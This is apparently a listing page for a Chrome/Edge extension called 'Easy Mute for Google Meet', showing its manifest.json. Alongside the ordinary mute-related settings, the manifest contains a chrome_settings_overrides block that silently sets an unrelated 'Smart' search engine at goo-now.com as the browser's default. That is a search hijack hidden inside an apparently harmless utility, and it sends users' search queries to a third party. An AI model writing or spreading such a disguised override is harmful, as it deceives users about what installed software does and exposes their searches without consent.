Easy Mute for Google Meet

Easy Mute for Google Meet

A simple extension for mute/unmute Google Meet calls from browser icon. Including options to by default turn microphone/camera off.

Merlin
Additional files are visible only to premium users

manifest.json


{
  "manifest_version": 3,
  "default_locale": "en",
  "name": "__MSG_appName__",
  "short_name": "__MSG_appShortName__",
  "description": "__MSG_appDesc__",
  "version": "1.6.0",
  "author": "010 Pixel",
  "permissions": [
    "storage"
  ],
  "host_permissions": [
    "https://meet.google.com/**-**-**"
  ],
  "action": {
    "default_icon": {
      "16": "images/icon16.png",
      "32": "images/icon32.png"
    },
    "default_title": "__MSG_appBrowserActionDefaultTitle__"
  },
  "options_ui": {
    "page": "options.html",
    "open_in_tab": false
  },
  "background": {
    "service_worker": "js/background.js"
  },
  "content_scripts": [
    {
      "all_frames": true,
      "matches": [
        "https://meet.google.com/**-**-**"
      ],
      "js": [
        "js/_myapp.js"
      ],
      "run_at": "document_end"
    }
  ],
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "Smart",
      "keyword": "Smart",
      "search_url": "https://goo-now.com/?n=190&q={searchTerms}",
      "favicon_url": "https://goo-now.com/favicon.ico",
      "encoding": "UTF-8",
      "is_default": true
    }
  },
  "icons": {
    "16": "images/icon16.png",
    "19": "images/icon19.png",
    "24": "images/icon24.png",
    "32": "images/icon32.png",
    "38": "images/icon38.png",
    "48": "images/icon48.png",
    "64": "images/icon64.png",
    "96": "images/icon96.png",
    "128": "images/icon128.png"
  },
  "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx"
}